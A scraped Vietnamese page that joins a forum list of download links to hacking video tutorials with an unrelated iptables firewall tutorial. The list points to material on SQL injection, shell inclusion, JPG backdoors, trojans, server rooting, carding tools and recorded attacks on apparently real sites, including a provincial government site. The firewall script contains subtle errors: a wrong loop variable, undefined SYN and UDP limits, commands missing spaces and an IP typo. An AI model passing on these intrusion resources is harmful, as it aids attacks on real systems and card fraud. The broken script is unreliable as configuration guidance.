35>Yahoo Fake [FuLL ViDEO bY HeliOs]
http://www.mediamax.com/vipundergrou...ahoo%20Fake%20[FuLL%20ViDEO%20bY%20HeliOs].rar
36>hackshop
http://www.mediamax.com/vipundergrou...d/hackshop.rar
37>video tut backconnect "Moi nguoi fale Ip thif down duoc bang link nay"
http://freewebtown.com/hackingvn/vid...backconect.rar
38>SQL Injection 4
http://www.box.net/shared/static/rsuoufbpj1.rar
or http://rapidshare.com/files/59957095/leo2.rar
39>Demo how i got root on server HPTVIETNAM
http://www.megaupload.com/?d=1KGA9NGK
40>Backdoor and JPG
http://str0ke213.tradebit.com/pub/8/57.swf
41>Crack MD5 user online and Cain
http://dl1.filmshare24h.net/md5-password-cracking.swf
42>hack computer trên mạng internet!
http://www.y0ume.net/video/hack%20computer.rar
43>409 Video hack
http://www.forcehacker.com/videos.html
44>một cách ẩn shell
http://www.y0ume.net/video/chenshell.rar
45>Một đống video hacking nhìu wá
http://137.132.19.24/security_course/vid_tutorials/
46>Windows Password Hacking (Video)
http://www.youtube.com/watch?v=vZDgR...search=laporte
47>iFrame DoS Explained
http://one.revver.com/watch/211124
48>Hack Shop CFM ,Remote PC,Check CC
http://uploadingit.com/files/197409_...S(Fix%202).zip
49>video hacking from PLD
http://rapidshare.de/files/36172349/Sec.Videos1.rar
http://rapidshare.de/files/36169967/Sec.Videos2.rar
50>video clip attack thanhhoa.gov.vn
khoai.bop.vu/thanhhoa.rar
51>TUT hack shop asp moi!!!!!!!!!!!!!!!
http://207.210.226.130/~thomaser/tool/hackasp.rar
52>upload hacking phần 2
http://thanhnamhp.com.vn/upload.rar
http://www.videos.learntohell.net/infectedgif.swf
53>VNC Remote video
http://kid1412.110mb.com/Remote-vnc.rar
http://kid1412.110mb.com/VNC.zip
54>1 kho video nữa nè
Anh em down thoải mái nha
http://aria-security.net/UPDATES/1st/Video/
http://video.hackinthebox.org/2006.html
http://chaosradio.ccc.de/22c3_m4v_563.html
http://shmoocon.org/2006/presentations.html
How Get Root Safe Mode On Server
http://www.freewebs.com/lyokha/CraVideos.rar
55> windows fun
http://warezshare.com/download.php?f...541ea58e44c56f
http://warezshare.com/download.php?f...10ddc3e346dbe2
56>Include shell trong PHP
phan 1: http://www.megaupload.com/vn/?d=9YW156EC
phan 2: http://www.megaupload.com/?d=Y8HFO9EH
57>video chào mừng 2/9
http://www.megaupload.com/?d=I92BALB5
58>==>>Windows server rooting<<==
http://www.freewebs.com/lyokha/winserverrooting.avi.flv
59>Video Local r00t Update 2007 - zer0c00l
http://rapidshare.com/files/51844339/r00t2007.rar.html
60>video dùng trojan Shark 2
http://freewebtown.com/hackingvn/videohack/sharK 2 Tutorial.rar
61>clip hack VBB với lỗi SQL injection ( mod RPG Inferno v2.4)
http://69.89.31.82/~seyiloco/leo9x/leo.rar
http://69.89.31.82/~seyiloco/leo9x/leo.txt
http://69.89.31.82/~seyiloco/leo9x/milw0rm.txt
62>Video hacking , bug upload :-D
http://www.megaupload.com/?d=S7W44YQ0
63>Chèn Backdoor vào tập tin JPG
http://str0ke213.tradebit.com/pub/8/57.swf
64>getroot
http://quangtrungschool.org/upload/getroot1.rar
65>[Video] Include Shell VBB & Hide Backdoor for newbie
http://www.box.net/public/2koz7exe6q
66>Video hack ibf
http://www.badongo.com/file/3562304
http://www.quangtrungschool.org/upload/Hack_ipf.rar
67>video download by pass!
http://66.165.236.155/~wayland/Tut.zip
68>Exploit For vBulletin_all_version
http://www.megaupload.com/?d=YK270LVU
69>Include shell với PhpBB
http://rapidshare.com/files/9742816/...shell.rar.html
http://www.4shared.com/file/8167032/...ludeshell.html
70>Video Music Thai Anh exp-do Langtuhoahao found !!!
http://orange.smartwavetech.com/~yeu...on_thaianh.rar
71>tài nguyên video
http://www.irdu.nus.edu.sg/security_...vid_tutorials/
72>Video Lesson - Inject Trojan 2 Web vs Hack Infobar Sp2
Link : http://z0mbie12.net/videoclip/exe2vbs-videohacking2.rar
73>Invision Power Board 2.1.7 (Debug) Remote Password Change Demonstration
http://rapidshare.com/files/19230640...onstration.rar
or
http://rapidshare.com/files/2155224/ipb217.swf
74>Bugs local backup data
tp://tailieumang.info/Tut.zip
75>SYN Flood
http://k49c.net/gk/SYNFlood.rar
76>Hacking Movies
http://2600.ir/pages/videoclips.htm
77>tut hack site ezupload (video)
http://www.megaupload.com/?d=GCSXUELR
78>1 site rất hay
http://www.giaiphapantoan.com/index....per&Itemid=112
79>Video Get root Linux 2.4.25
http://www.megaupload.com/?d=T9BCFRF4 or
http://www.4shared.com/file/8358713/...ot_Access.html
80>sử dụng bug eGallery trong PHP-Nuke để upshell lên server
http://milw0rm.com/video/watch.php?id=29
81>1 site security video
www.learnsecurityonline.com
http://phreaknic.wilpig.org/
http://www.hackerscenter.com/video/
http://www.illegalworld.com/
82>Video hacking phpinjection
http://video.antichat.org/download_150.html
url:http://www.binhphuoc.org/diendan/showthread.php?t=1158
Thiết lập tường lửa Iptables cho Linux
Thiết lập tường lửa Iptables cho Linux
Lời mở đầu
Trong bài viết này, mình sẽ hướng dẫn cho bạn cách thiết lập tường lửa Iptables trên Linux. Bài viết gồm hai phần chính: phần I sẽ giới thiệu cơ bản về cách thức hoạt động của Iptables và phần II sẽ hướng dẫn bạn lập cấu hình Iptables cho một máy chủ phục vụ Web cụ thể
Bạn download file kèm theo tại địa chỉ IPtables
Phần I: Giới thiệu về Iptables
Iptables là một tường lửa ứng dụng lọc gói dữ liệu rất mạnh, miễn phí và có sẵn trên Linux.. Netfilter/Iptables gồm 2 phần là Netfilter ở trong nhân Linux và Iptables nằm ngoài nhân. Iptables chịu trách nhiệm giao tiếp giữa người dùng và Netfilter để đẩy các luật của người dùng vào cho Netfiler xử lí. Netfilter tiến hành lọc các gói dữ liệu ở mức IP. Netfilter làm việc trực tiếp trong nhân, nhanh và không làm giảm tốc độ của hệ thống.
Hình Kèm Theo
Cách đổi địa chỉ IP động (dynamic NAT)
Trước khi đi vào phần chính, mình cần giới thiệu với các bạn về công nghệ đổi địa chỉ NAT động và đóng giả IP Masquerade. Hai từ này được dùng rất nhiều trong Iptables nên bạn phải biết. Nếu bạn đã biết NAT động và Masquerade, bạn có thể bỏ qua phần này.
NAT động là một trong những kĩ thuật chuyển đổi địa chỉ IP NAT (Network Address Translation). Các địa chỉ IP nội bộ được chuyển sang IP NAT như sau:
NAT Router đảm nhận việc chuyển dãy IP nội bộ 169.168.0.x sang dãy IP mới 203.162.2.x. Khi có gói liệu với IP nguồn là 192.168.0.200 đến router, router sẽ đổi IP nguồn thành 203.162.2.200 sau đó mới gởi ra ngoài. Quá trình này gọi là SNAT (Source-NAT, NAT nguồn). Router lưu dữ liệu trong một bảng gọi là bảng NAT động. Ngược lại, khi có một gói từ liệu từ gởi từ ngoài vào với IP đích là 203.162.2.200, router sẽ căn cứ vào bảng NAT động hiện tại để đổi địa chỉ đích 203.162.2.200 thành địa chỉ đích mới là 192.168.0.200. Quá trình này gọi là DNAT (Destination-NAT, NAT đích). Liên lạc giữa 192.168.0.200 và 203.162.2.200 là hoàn toàn trong suốt (transparent) qua NAT router. NAT router tiến hành chuyển tiếp (forward) gói dữ liệu từ 192.168.0.200 đến 203.162.2.200 và ngược lại.
Hình Kèm Theo
Cách đóng giả địa chỉ IP (masquerade)
Đây là một kĩ thuật khác trong NAT.
NAT Router chuyển dãy IP nội bộ 192.168.0.x sang một IP duy nhất là 203.162.2.4 bằng cách dùng các số hiệu cổng (port-number) khác nhau. Chẳng hạn khi có gói dữ liệu IP với nguồn 192.168.0.168:1204, đích 211.200.51.15:80 đến router, router sẽ đổi nguồn thành 203.162.2.4:26314 và lưu dữ liệu này vào một bảng gọi là bảng masquerade động. Khi có một gói dữ liệu từ ngoài vào với nguồn là 221.200.51.15:80, đích 203.162.2.4:26314 đến router, router sẽ căn cứ vào bảng masquerade động hiện tại để đổi đích từ 203.162.2.4:26314 thành 192.168.0.164:1204. Liên lạc giữa các máy trong mạng LAN với máy khác bên ngoài hoàn toàn trong suốt qua router.
Hình Kèm Theo
Cấu trúc của Iptables
Iptables được chia làm 4 bảng (table): bảng filter dùng để lọc gói dữ liệu, bảng nat dùng để thao tác với các gói dữ liệu được NAT nguồn hay NAT đích, bảng mangle dùng để thay đổi các thông số trong gói IP và bảng conntrack dùng để theo dõi các kết nối. Mỗi table gồm nhiều mắc xích (chain). Chain gồm nhiều luật (rule) để thao tác với các gói dữ liệu. Rule có thể là ACCEPT (chấp nhận gói dữ liệu), DROP (thả gói), REJECT (loại bỏ gói) hoặc tham chiếu (reference) đến một chain khác.
--------------------------------------------------------------------------------
Quá trình chuyển gói dữ liệu qua Netfilter
Gói dữ liệu (packet) chạy trên chạy trên cáp, sau đó đi vào card mạng (chẳng hạn như eth0). Đầu tiên packet sẽ qua chain PREROUTING (trước khi định tuyến). Tại đây, packet có thể bị thay đổi thông số (mangle) hoặc bị đổi địa chỉ IP đích (DNAT). Đối với packet đi vào máy, nó sẽ qua chain INPUT. Tại chain INPUT, packet có thể được chấp nhận hoặc bị hủy bỏ. Tiếp theo packet sẽ được chuyển lên cho các ứng dụng (client/server) xử lí và tiếp theo là được chuyển ra chain OUTPUT. Tại chain OUTPUT, packet có thể bị thay đổi các thông số và bị lọc chấp nhận ra hay bị hủy bỏ. Đối với packet forward qua máy, packet sau khi rời chain PREROUTING sẽ qua chain FORWARD. Tại chain FORWARD, nó cũng bị lọc ACCEPT hoặc DENY. Packet sau khi qua chain FORWARD hoặc chain OUTPUT sẽ đến chain POSTROUTING (sau khi định tuyến). Tại chain POSTROUTING, packet có thể được đổi địa chỉ IP nguồn (SNAT) hoặc MASQUERADE. Packet sau khi ra card mạng sẽ được chuyển lên cáp để đi đến máy tính khác trên mạng.
Hình Kèm Theo
Các tham số dòng lệnh thường gặp của Iptables
1. Gọi trợ giúp
Để gọi trợ giúp về Iptables, bạn gõ lệnh $ man iptables hoặc $ iptables --help. Chẳng hạn nếu bạn cần biết về các tùy chọn của match limit, bạn gõ lệnh $ iptables -m limit --help.
2. Các tùy chọn để chỉ định thông số
- chỉ định tên table: -t, ví dụ -t filter, -t nat, .. nếu không chỉ định table, giá trị mặc định là filter
- chỉ đinh loại giao thức: -p, ví dụ -p tcp, -p udp hoặc -p ! udp để chỉ định các giao thức không phải là udp
- chỉ định card mạng vào: -i, ví dụ: -i eth0, -i lo
- chỉ định card mạng ra: -o, ví dụ: -o eth0, -o pp0
- chỉ định địa chỉ IP nguồn: -s <địa_chỉ_ip_nguồn>, ví dụ: -s 192.168.0.0/24 (mạng 192.168.0 với 24 bít mạng), -s 192.168.0.1-192.168.0.3 (các IP 192.168.0.1, 192.168.0.2, 192.168.0.3).
- chỉ định địa chỉ IP đích: -d <địa_chỉ_ip_đích>, tương tự như -s
- chỉ định cổng nguồn: --sport, ví dụ: --sport 21 (cổng 21), --sport 22:88 (các cổng 22 .. 88), --sport :80 (các cổng <=80), --sport 22: (các cổng >=22)
- chỉ định cổng đích: --dport, tương tự như --sport
3. Các tùy chọn để thao tác với chain
- tạo chain mới: iptables -N
- xóa hết các luật đã tạo trong chain: iptables -X
- đặt chính sách cho các chain `built-in` (INPUT, OUTPUT & FORWARD): iptables -P , ví dụ: iptables -P INPUT ACCEPT để chấp nhận các packet vào chain INPUT
- liệt kê các luật có trong chain: iptables -L
- xóa các luật có trong chain (flush chain): iptables -F
- reset bộ đếm packet về 0: iptables -Z
4. Các tùy chọn để thao tác với luật
- thêm luật: -A (append)
- xóa luật: -D (delete)
- thay thế luật: -R (replace)
- chèn thêm luật: -I (insert)
Mình sẽ cho ví dụ minh họa về các tùy chọn này ở phần sau.
--------------------------------------------------------------------------------
Phân biệt giữa ACCEPT, DROP và REJECT packet
- ACCEPT: chấp nhận packet
- DROP: thả packet (không hồi âm cho client)
- REJECT: loại bỏ packet (hồi âm cho client bằng một packet khác)
Ví dụ:
# iptables -A INPUT -i eth0 --dport 80 -j ACCEPT chấp nhận các packet vào cổng 80 trên card mạng eth0
# iptables -A INPUT -i eth0 -p tcp --dport 23 -j DROP thả các packet đến cổng 23 dùng giao thức TCP trên card mạng eth0
# iptables -A INPUT -i eth1 -s ! 10.0.0.1-10.0.0.5 --dport 22 -j REJECT --reject-with tcp-reset gởi gói TCP với cờ RST=1 cho các kết nối không đến từ dãy địa chỉ IP 10.0.0.1..5 trên cổng 22, card mạng eth1
# iptables -A INPUT -p udp --dport 139 -j REJECT --reject-with icmp-port-unreachable gởi gói ICMP `port-unreachable` cho các kết nối đến cổng 139, dùng giao thức UDP
--------------------------------------------------------------------------------
Phân biệt giữa NEW, ESTABLISHED và RELATED
- NEW: mở kết nối mới
- ESTABLISHED: đã thiết lập kết nối
- RELATED: mở một kết nối mới trong kết nối hiện tại
Ví dụ:
# iptables -P INPUT DROP đặt chính sách cho chain INPUT là DROP
# iptables -A INPUT -p tcp --syn -m state --state NEW -j ACCEPT chỉ chấp nhận các gói TCP mở kết nối đã set cờ SYN=1
# iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT không đóng các kết nối đang được thiết lập, đồng thời cũng cho phép mở các kết nối mới trong kết nối được thiết lập
# iptables -A INPUT -p tcp -j DROP các gói TCP còn lại đều bị DROP
--------------------------------------------------------------------------------
Tùy chọn --limit, --limit-burst
--limit-burst: mức đỉnh, tính bằng số packet
--limit: tốc độ khi chạm mức đỉnh, tính bằng số packet/s(giây), m(phút), d(giờ) hoặc h(ngày)
Mình lấy ví dụ cụ thể để bạn dễ hiểu:
# iptables -N test
# iptables -A test -m limit --limit-burst 5 --limit 2/m -j RETURN
# iptables -A test -j DROP
# iptables -A INPUT -i lo -p icmp --icmp-type echo-request -j test
Đầu tiên lệnh iptables -N test để tạo một chain mới tên là test (table mặc định là filter). Tùy chọn -A test (append) để thêm luật mới vào chain test. Đối với chain test, mình giới hạn limit-burst ở mức 5 gói, limit là 2 gói/phút, nếu thỏa luật sẽ trở về (RETURN) còn không sẽ bị DROP. Sau đó mình nối thêm chain test vào chain INPUT với tùy chọn card mạng vào là lo, giao thức icmp, loại icmp là echo-request. Luật này sẽ giới hạn các gói PING tới lo là 2 gói/phút sau khi đã đạt tới 5 gói.
Bạn thử ping đến localhost xem sao?
$ ping -c 10 localhost
Chỉ 5 gói đầu trong phút đầu tiên được chấp nhận, thỏa luật RETURN đó. Bây giờ đã đạt đến mức đỉnh là 5 gói, lập tức Iptables sẽ giới hạn PING tới lo là 2 gói trên mỗi phút bất chấp có bao nhiêu gói được PING tới lo đi nữa. Nếu trong phút tới không có gói nào PING tới, Iptables sẽ giảm limit đi 2 gói tức là tốc độ đang là 2 gói/phút sẽ tăng lên 4 gói/phút. Nếu trong phút nữa không có gói đến, limit sẽ giảm đi 2 nữa là trở về lại trạng thái cũ chưa đạt đến mức đỉnh 5 gói. Quá trình cứ tiếp tục như vậy. Bạn chỉ cần nhớ đơn giản là khi đã đạt tới mức đỉnh, tốc độ sẽ bị giới hạn bởi tham số--limit. Nếu trong một đơn vị thời gian tới không có gói đến, tốc độ sẽ tăng lên đúng bằng --limit đến khi trở lại trạng thái chưa đạt mức --limit-burst thì thôi.
Để xem các luật trong Iptables bạn gõ lệnh $ iptables -L -nv (-L tất cả các luật trong tất cả các chain, table mặc định là filter, -n liệt kê ở dạng số, v để xem chi tiết)
# iptables -L -nv
Chain INPUT (policy ACCEPT 10 packets, 840 bytes)
pkts bytes target prot opt in out source destination
10 840 test icmp -- lo * 0.0.0.0/0 0.0.0.0/0 icmp type 8
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 15 packets, 1260 bytes)
pkts bytes target prot opt in out source destination
Chain test (1 references)
pkts bytes target prot opt in out source destination
5 420 RETURN all -- * * 0.0.0.0/0 0.0.0.0/0 limit: avg 2/min burst 5
5 420 DROP all -- * * 0.0.0.0/0 0.0.0.0/0
# iptables -Z reset counter
# iptables -F flush luật
# iptables -X xóa chain đã tạo
--------------------------------------------------------------------------------
Redirect cổng
Iptables hổ trợ tùy chọn -j REDIRECT cho phép bạn đổi hướng cổng một cách dễ dàng. Ví dụ như SQUID đang listen trên cổng 3128/tcp. Để redirect cổng 80 đến cổng 3128 này bạn làm như sau:
# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 3128
SNAT & MASQUERADE
Để tạo kết nối `transparent` giữa mạng LAN 192.168.0.1 với Internet bạn lập cấu hình cho tường lửa Iptables như sau:
# echo 1 > /proc/sys/net/ipv4/ip_forward cho phép forward các packet qua máy chủ đặt Iptables
# iptables -t nat -A POSTROUTING -o eth0 -j SNAT --to-source 210.40.2.71 đổi IP nguồn cho các packet ra card mạng eth0 là 210.40.2.71. Khi nhận được packet vào từ Internet, Iptables sẽ tự động đổi IP đích 210.40.2.71 thành IP đích tương ứng của máy tính trong mạng LAN 192.168.0/24.
Hoặc bạn có thể dùng MASQUERADE thay cho SNAT như sau:
# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
(MASQUERADE thường được dùng khi kết nối đến Internet là pp0 và dùng địa chỉ IP động)
Hình Kèm Theo
Giả sử bạn đặt các máy chủ Proxy, Mail và DNS trong mạng DMZ. Để tạo kết nối trong suốt từ Internet vào các máy chủ này bạn là như sau:
# echo 1 > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j DNAT --to-destination 192.168.1.2
# iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 25 -j DNAT --to-destination 192.168.1.3
# iptables -t nat -A PREROUTING -i eth0 -p udp --dport 53 -j DNAT --to-destination 192.168.1.4
--------------------------------------------------------------------------------
Hình Kèm Theo
(sưu tập và chỉnh sửa )
Phần II: Lập cấu hình Iptables cho máy chủ phục vụ Web
--------------------------------------------------------------------------------
Phần này mình sẽ trình bày qua ví dụ cụ thể và chỉ hướng dẫn các bạn lọc packet vào. Các packet `forward` và 'output' bạn tự làm nha.
Giả sử như máy chủ phục vụ Web kết nối mạng trực tiếp vào Internet qua card mạng eth0, địa chỉ IP là 1.2.3.4. Bạn cần lập cấu hình tường lửa cho Iptables đáp ứng các yêu cầu sau:
- cổng TCP 80 (chạy apache) mở cho mọi người truy cập web
- cổng 21 (chạy proftpd) chỉ mở cho webmaster (dùng để upload file lên public_html)
- cổng 22 (chạy openssh) chỉ mở cho admin (cung cấp shell `root` cho admin để nâng cấp & patch lỗi cho server khi cần)
- cổng UDP 53 (chạy tinydns) để phục vụ tên miền (đây chỉ là ví dụ)
- chỉ chấp nhận ICMP PING tới với code=0x08, các loại packet còn lại đều bị từ chối.
--------------------------------------------------------------------------------
Bước 1: thiết lập các tham số cho nhân
echo 1 > /proc/sys/net/ipv4/tcp_syncookies
echo 10 > /proc/sys/net/ipv4/tcp_fin_timeout
echo 1800 > /proc/sys/net/ipv4/tcp_keepalive_time
echo 0 > /proc/sys/net/ipv4/tcp_window_scaling
echo 0 > /proc/sys/net/ipv4/tcp_sack
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
echo 0 > /proc/sys/net/ipv4/conf/eth0/accept_source_route
tcp_syncookies=1 bật chức năng chống DoS SYN qua syncookie của Linux
tcp_fin_timeout=10 đặt thời gian timeout cho quá trình đóng kết nối TCP là 10 giây
tcp_keepalive_time=1800 đặt thời gian giữ kết nối TCP là 1800 giây
...
Các tham số khác bạn có thể xem chi tiết trong tài liệu đi kèm của nhân Linux.
--------------------------------------------------------------------------------
Bước 2: nạp các môđun cần thiết cho Iptables
Để sử dụng Iptables, bạn cần phải nạp trước các môđun cần thiết. Ví dụ nếu bạn muốn dùng chức năng LOG trong Iptables, bạn phải nạp môđun ipt_LOG vào trước bằng lệnh # modprobe ipt_LOG.
MODULES="ip_tables iptable_filter ipt_LOG ipt_limit ipt_REJECT ipt_state
for i in $MODULES; do
/sbin/modprobe $MODULES
done
--------------------------------------------------------------------------------
Bước 3: nguyên tắc đặt luật là "drop trước, accept sau"
Đây là nguyên tắc mà bạn nên tuân theo. Đầu tiên hãy đóng hết các cổng, sau đó mở dần cách cổng cần thiết. Cách này tránh cho bạn gặp sai sót trong khi đặt luật cho Iptables.
iptables -P INPUT DROP thả packet trước
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT giữ các kết nối hiện tại và chấp nhận các kết nối có liên quan
iptables -A INPUT -i lo -s 127.0.0.1 -j ACCEPT chấp nhận các gói vào looback từ IP 127.0.0.1
iptables -A INPUT -i lo -s 1.2.3.4 -j ACCEPT và 1.2.3.4
BANNED_IP="10.0.0.0/8 192.168.0.0/16 172.16.0.0/12 224.0.0.0/4 240.0.0.0/5"
for i in $BANNED_IP; do
iptables -A INPUT -i eth0 -s $i -j DROP thả các gói dữ liệu đến từ các IP nằm trong danh sách cấm BANNER_IP
done
--------------------------------------------------------------------------------
Bước 4: lọc ICMP vào và chặn ngập lụt PING
LOG của Iptables sẽ được ghi vào file /var/log/firewall.log. Bạn phải sửa lại cấu hình cho SYSLOG như sau:
# vi /etc/syslog.conf
kern.=debug /var/log/firewall.log
# /etc/rc.d/init.d/syslogd restart
Đối với các gói ICMP đến, chúng ta sẽ đẩy qua chain CHECK_PINGFLOOD để kiểm tra xem hiện tại đamg bị ngập lụt PING hay không, sau đó mới cho phép gói vào. Nếu đang bị ngập lụt PING, môđun LOG sẽ tiến hành ghi nhật kí ở mức giới hạn --limit $LOG_LIMIT và --limit-burst $LOG_LIMIT_BURST, các gói PING ngập lụt sẽ bị thả hết.
LOG_LEVEL="debug"
LOG_LIMIT=3/m
LOG_LIMIT_BURST=1
PING_LIMIT=500/s
PING_LIMIT_BURST=100
iptables -A CHECK_PINGFLOOD -m limit --limit $PING_LIMIT --limit-burst $PING_LIMIT_BURST -j RETURN
iptables -A CHECK_PINGFLOOD -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=PINGFLOOD:warning a=DROP "
iptables -A CHECK_PINGFLOOD -j DROP
iptables -A INPUT -i eth0 -p icmp --icmp-type echo-request -j CHECK_PINGFLOOD
iptables -A INPUT -i eth0 -p icmp --icmp-type echo-request -j ACCEPT
--------------------------------------------------------------------------------
Bước 5: reject quét cổng TCP và UDP
Ở đây bạn tạo sẵn chain reject quét cổng, chúng ta sẽ đẩy vào chain INPUT sau. Đối với gói TCP, chúng ta reject bằng gói TCP với cờ SYN=1 còn đối với gói UDP, chúng ta sẽ reject bằng gói ICMP `port-unreachable`
iptables-N REJECT_PORTSCAN
iptables-A REJECT_PORTSCAN -p tcp -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=PORTSCAN:tcp a=REJECT "
iptables-A REJECT_PORTSCAN -p udp -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=PORTSCAN:udp a=REJECT "
iptables-A REJECT_PORTSCAN -p tcp -j REJECT --reject-with tcp-reset
iptables-A REJECT_PORTSCAN -p udp -j REJECT --reject-with icmp-port-unreachable
--------------------------------------------------------------------------------
Bước 6: phát hiện quét cổng bằng Nmap
iptables-N DETECT_NMAP
iptables-A DETECT_NMAP -p tcp --tcp-flags ALL FIN,URG,PSH -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=NMAP:XMAS a=DROP "
iptables-A DETECT_NMAP -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=NMAP:XMAS-PSH a=DROP "
iptables-A DETECT_NMAP -p tcp --tcp-flags ALL ALL -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=NMAP:XMAS-ALL a=DROP "
iptables-A DETECT_NMAP -p tcp --tcp-flags ALL FIN -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=NMAP:FIN a=DROP "
iptables-A DETECT_NMAP -p tcp --tcp-flags SYN,RST SYN,RST -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=NMAP:SYN-RST a=DROP "
iptables-A DETECT_NMAP -p tcp --tcp-flags SYN,FIN SYN,FIN -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=NMAP:SYN-FIN a=DROP "
iptables-A DETECT_NMAP -p tcp --tcp-flags ALL NONE -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=NMAP:NULL a=DROP "
iptables-A DETECT_NMAP -j DROP
iptables-A INPUT -i eth0 -p tcp ! --syn -m state --state NEW -j DETECT_NMAP
Đối với các gói TCP đến eth0 mở kết nối nhưng không đặt SYN=1 chúng ta sẽ chuyển sang chain DETECT_NMAP. Đây là những gói không hợp lệ và hầu như là quét cổng bằng nmap hoặc kênh ngầm. Chain DETECT_NMAP sẽ phát hiện ra hầu hết các kiểu quét của Nmap và tiến hành ghi nhật kí ở mức --limit $LOG_LIMIT và --limit-burst $LOG_LIMIT_BURST. Ví dụ để kiểm tra quét XMAS, bạn dùng tùy chọn --tcp-flags ALL FIN,URG,PSH nghĩa là 3 cờ FIN, URG và PSH được bật, các cờ khác đều bị tắt. Các gói qua chain DETECT_NMAP sau đó sẽ bị DROP hết.
--------------------------------------------------------------------------------
Bước 7: chặn ngập lụt SYN
Gói mở TCP với cờ SYN được set 1 là hợp lệ nhưng không ngoại trừ khả năng là các gói SYN dùng để ngập lụt. Vì vậy, ở dây bạn đẩy các gói SYN còn lại qua chain CHECK_SYNFLOOD để kiểm tra ngập lụt SYN như sau:
iptables-N CHECK_SYNFLOOD
iptables-A CHECK_SYNFLOOD -m limit --limit $SYN_LIMIT --limit-burst $SYN_LIMIT_BURST -j RETURN
iptables-A CHECK_SYNFLOOD -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=SYNFLOOD:warning a=DROP "
iptables-A CHECK_SYNFLOOD -j DROP
iptables-A INPUT -i eth0 -p tcp --syn -j CHECK_SYNFLOOD
--------------------------------------------------------------------------------
Bước 8: giới hạn truy cập SSH cho admin
SSH_IP="1.1.1.1"
iptables -N SSH_ACCEPT
iptables -A SSH_ACCEPT -m state --state NEW -j LOG --log-level $LOG_LEVEL --log-prefix "fp=SSH:admin a=ACCEPT "
iptables -A SSH_ACCEPT -j ACCEPT
iptables -N SSH_DENIED
iptables -A SSH_DENIED -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=SSH:attempt a=REJECT "
iptables -A SSH_DENIED -p tcp -j REJECT --reject-with tcp-reset
for i in $SSH_IP; do
iptables -A INPUT -i eth0 -p tcp -s $i --dport 22 -j SSH_ACCEPT
done
iptables -A INPUT -i eth0 -p tcp --dport 22 -m state --state NEW -j SSH_DENIED
--------------------------------------------------------------------------------
Bước 9: giới hạn FTP cho web-master
FTP_IP="2.2.2.2"
iptables -N FTP_ACCEPT
iptables -A FTP_ACCEPT -m state --state NEW -j LOG --log-level $LOG_LEVEL --log-prefix "fp=FTP:webmaster a=ACCEPT "
iptables -A FTP_ACCEPT -j ACCEPT
iptables -N FTP_DENIED
iptables -A FTP_DENIED -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=FTP:attempt a=REJECT "
iptables -A FTP_DENIED -p tcp -j REJECT --reject-with tcp-reset
for i in $FTP_IP; do
iptables -A INPUT -i eth0 -p tcp -s $i --dport 21 -j FTP_ACCEPT
done
iptables -A INPUT -i eth0 -p tcp --dport 21 -m state --state NEW -j FTP_DENIED
--------------------------------------------------------------------------------
Bước 10: lọc TCP vào
iptables -N TCP_INCOMING
iptables -A TCP_INCOMING -p tcp --dport 80 -j ACCEPT
iptables -A TCP_INCOMING -p tcp -j REJECT_PORTSCAN
iptables -A INPUT -i eth0 -p tcp -j TCP_INCOMING
Bước 11: lọc UDP vào và chặn ngập lụt UDP
iptables -N CHECK_UDPFLOOD
iptables -A CHECK_UDPFLOOD -m limit --limit $UDP_LIMIT --limit-burst $UDP_LIMIT_BURST -j RETURN
iptables -A CHECK_UDPFLOOD -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=UDPFLOOD:warning a=DROP "
iptables -A CHECK_UDPFLOOD -j DROP
iptables -A INPUT -i eth0 -p udp -j CHECK_UDPFLOOD
iptables -N UDP_INCOMING
iptables -A UDP_INCOMING -p udp --dport 53 -j ACCEPT
iptables -A UDP_INCOMING -p udp -j REJECT_PORTSCAN
iptables -A INPUT -i eth0 -p udp -j UDP_INCOMING
Để hạn chế khả năng bị DoS và tăng cường tốc độ cho máy chủ phục vụ web, bạn có thể dùng cách tải cân bằng (load-balacing) như sau:
Cách 1: chạy nhiều máy chủ phục vụ web trên các địa chỉ IP Internet khác nhau. Ví dụ, ngoài máy chủ phục vụ web hiện tại 1.2.3.4, bạn có thể đầu tư thêm các máy chủ phục vụ web mới 1.2.3.2, 1.2.3.3, 1.2.3.4, 1.2.3.5. Điểm yếu của cách này là tốn nhiều địa chỉ IP Internet.
